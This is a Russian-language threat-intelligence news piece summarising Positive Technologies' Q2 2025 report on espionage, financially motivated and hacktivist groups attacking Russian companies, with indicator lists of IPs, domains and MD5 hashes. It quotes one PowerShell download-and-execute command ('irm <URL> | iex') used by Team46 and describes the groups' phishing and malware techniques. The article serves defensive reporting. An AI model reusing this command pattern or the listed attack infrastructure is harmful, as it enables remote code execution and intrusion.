Positive Technologies раскрыла тактики хакерских группировок, атакующих российские компании во II квартале 2025 года

Шпионаж: новые маскировки и старые уязвимости

Группировка Team46 (также известная как TaxOff или Prosperous Werewolf) продолжила атаки на госучреждения, ИТ и транспортные компании. В марте 2025 года она использовала фишинговые письма с эксплуатацией уязвимости CVE-2025-2783 в Chrome для доставки бэкдора Trinper. Эксперты PT TI установили прямую связь между Team46 и TaxOff через идентичные параметры запуска PowerShell-скриптов: команды вида "powershell -w minimized -ep Bypass -nop -c "irm <URL> | iex"" применялись обеими группами с незначительными вариациями URL. Сходство векторов атак, включая использование эксплойтов нулевого дня (ранее - CVE-2024-6473 в «Яндекс.Браузере»), указывает на переименование или ответвление инфраструктуры.

PseudoGamaredon (Awaken Likho) фокусировалась на военно-промышленном комплексе и госсекторе, рассылая документы-приманки вроде «Спецификация 13_ Гидравлика». При их открытии в фоне устанавливался клиент UltraVNC, обеспечивающий скрытый удаленный доступ. Группировка не меняла инструментарий, полагаясь на социальную инженерию, что позволяет ей тиражировать атаки даже при обновлении антивирусных баз.

Финансово мотивированная Rare Werewolf, вопреки ранним оценкам, сместила фокус на сбор конфиденциальных данных. В апреле-июне группа атаковала предприятия ОПК, рассылая архивы с паролем в теле письма. Внутри содержался SCR-файл, запускавший скрипты для дампа реестров SAM/SYSTEM и установки AnyDesk. Новшеством стал переход с ngrok на собственный SSH-туннель через утилиту Tuna для скрытности соединения.

Фишинг под видом госучреждений

PhaseShifters (Angry Likho) активизировались в мае, имитируя рассылки Минобрнауки РФ через домен minobnauki[.]ru. В архивах с «Приложением к письму» скрывался QuasarRAT, замаскированный под DOCX-файл. Вредонос проверял наличие антивирусов (Sophos, Avast), объединял фрагменты кода (.adt) в исполняемый файл и внедрялся в процесс RegAsm.exe для обхода контроля целостности. Инфраструктура группы, включая IP 5.8.11[.]119, ранее использовалась для фишинга от имени Минпромторга.

Группировка TA Tolik (Fairy Wolf) возобновила активность в апреле, рассылая HTA-файлы в архивах («Исх 14322-13 от 27.05.2025»). Их скрипты внедряли стилер Unicorn, который хранил вредоносную логику в зашифрованном виде в реестре Windows, динамически загружая её в память. Эксперты PT TI обнаружили украиноязычные артефакты: LNK-файлы с описаниями вроде «Ярлик для запуску PowerShell команди» и домены teiehram[.]org, зарегистрированные на адрес в Киеве. Электронный ящик [email protected], использовавшийся для фишинга против ВПК, был привязан к украинскому номеру телефона.

Финансовые угрозы: от шифровальщиков до стилеров

Werewolves (Moonshine Trickster) атаковали строительный и гостиничный сектор через DOC-файлы («рекламация.doc»). Эксплуатация уязвимостей CVE-2017-0199 и CVE-2017-11882 приводила к загрузке HTA-стегера Cobalt Strike с сокращенных URL (yip[.]su). Beacon-агент устанавливал TLS-соединение с C2, обеспечивая злоумышленникам полный контроль.

DarkGaboon (Vengeful Wolf) рассылала поддельные акты сверки расчетов (например, «Aкт cвepки...pdf.scr»). Внутри архивов находился обфусцированный Revenge RAT или XWorm, подписанный фальшивыми сертификатами. После сбора данных дроппер запускал шифровальщик LockBit 3.0 без эксфильтрации, удаляя следы BAT-скриптом. Группировка использовала динамические DNS (kilimanjaro.theworkpc[.]com) и прокси-сервер room155[.]online с 500 субдоменами, что затрудняло отслеживание.

### Хактивизм: деструктивные атаки и массовые взломы
Проукраинская группа Black Owl (BO Team) провела атаку в мае, создав фишинговые домены rzd-partner[.]pro и rzd-partner[.]store. В архиве RZD_Forum_28.05.rar распространялся файл «Программа Форума.pdf .exe», где невидимый символ Unicode (U+205F) маскировал расширение .exe. При запуске открывался PDF-документ, а в фоне действовал бэкдор BrockenDoor с новыми командами, включая загрузку PE-файлов в память (Reflective Load).

Эксперты отметили рост массовых взломов небольших сайтов (онлайн-магазины, блоги). Скомпрометированные ресурсы используются для фишинга, размещения малвари или продажи shell-доступов. Например, группа setupp.es торгует данными через платформу xleet[.]in, а иранские хактивисты размещают пропагандистские заглушки на взломанных сайтах.

Ключевые тренды и прогноз

По данным отчета, 92% атак начались с фишинга. Злоумышленники активно регистрируют домены-двойники (minobnauki[.]ru), используют Fastly для маскировки C2-трафика и внедряют нейросетевые инструменты для обфускации кода. PseudoGamaredon и Rare Werewolf демонстрируют высокую адаптивность, сочетая старые инструменты (UltraVNC, AnyDesк) с новыми каналами связи (Telegram, Tuna).

«Рост активности хактивистов и усложнение финансовых атак требуют усиления мер защиты, - комментирует руководитель PT TI Алексей Новиков. - Критически важны тренинги по распознаванию фишинга, сегментация сетей и мониторинг аномалий PowerShell». Эксперты прогнозируют увеличение атак через легитимные сервисы (Ngrok, Fastly) и использование ИИ для генерации убедительных фишинговых текстов.

IPv4

• 103.71.20.195
• 185.117.153.140
• 185.221.152.17
• 185.81.114.15
• 188.114.96.3
• 188.114.97.3
• 193.124.33.207
• 31.172.74.174
• 5.8.11.119
• 80.85.155.40
• 92.63.173.57
• 92.63.173.61
• 94.142.140.52

Domains

• 2025primakovreadings.info
• about-sport.ru
• ads-stream-api-v2.global.ssl.fastly.net
• almaz-anley.site
• almaz-antey-info.online
• alternativa123.ru
• antey-almaz-info.site
• autotificate.com
• browser-time-stats.global.ssl.fastly.net
• clip-rdp-api.global.ssl.fastly.net
• cloud-telegram.ru
• common-rdp-front.global.ssl.fastly.net
• elk-divine-immensely.ngrok-free.app
• fast-telemetry-api.global.ssl.fastly.net
• forum-drom.ru
• front-static-api.global.ssl.fastly.net
• mail.min-prom.ru
• main-front-api.global.ssl.fastly.net
• mil-by.info
• minobnauki.ru
• min-prom.ru
• ms-appdata-fonts.global.ssl.fastly.net
• ms-appdata-main.global.ssl.fastly.net
• ms-appdata-query.global.ssl.fastly.net
• nedvij-gel.ru
• opezdol.org
• pl82.ru
• primakovreadings.info
• primakovreadings2025.info
• rdp-api-front.global.ssl.fastly.net
• rdp-query-api.global.ssl.fastly.net
• rdp-statistics-api.global.ssl.fastly.net
• siloneq.ru
• superjoke.ru
• teiehram.org
• tent-lsk.ru
• vniir.nl
• wondrous-bluejay-lively.ngrok-free.app

MD5

• 07d2b50cf8ffe13a4722955ea94317aa
• 0bbb3a2ac9ba7d14a784cbc2519fbd64
• 16f6227f760487a70a3168cf9a497ac3
• 1a2df6d36edf9789ea1261a50cbea7ee
• 1b7b4608f2c9e0a4863a00edd60c3b78
• 1fea1f181d0ded434cd5f488893ce51b
• 21829394cac736a528267f9054fad3a4
• 2b7004cb00d58967c7d6677495d3422e
• 3814bcc23d5e8e9fa39c0e2c610aec15
• 40ef2615afb15f61072d7cea9b1a856a
• 4b51f3021d8426b8356cd5751ad6ebd0
• 4bf13f1be4c5e79300e9422c51d131f8
• 54685b75d32cadf4dfdc3a25e6ed02cb
• 565f8d22fa003ac7014d5d8efd8c1a53
• 57fec70f4ac0f3d8b640faf133aac7e0
• 5f47e40f3a36cc06bbaec27b063cd195
• 681af8a70203832f9b8de10a8d51860a
• 6d5a097e9407abf91d517fc75d63a23f
• 7b02f6bbe04f989db804154e87e5f726
• 7d3a30dbf4fd3edaf4dde35ccb5cf926
• 8bbe0c8f2a1d6fe94a41eb3e01d90866
• 8ed87e97879cba7b64d61445991312a6
• bce5f46b41063ab8e1075cc77ca7343b
• beb45d5b740ac1f52ed552a73502b01f
• ca767542f4af58fc3072e74574725ee3
• d003e812336221db029f02738451215c
• d69854b4a5c324082e157f04889ba138
• dba17d2faa311f28e68477ea5cc1a300
• e337949e7f5e257a38f869599e58e47e
• f04aecd527cd9a18176a4f1f7c12e0c3
• f3a70b8073ce2276af75b1cc2f18aced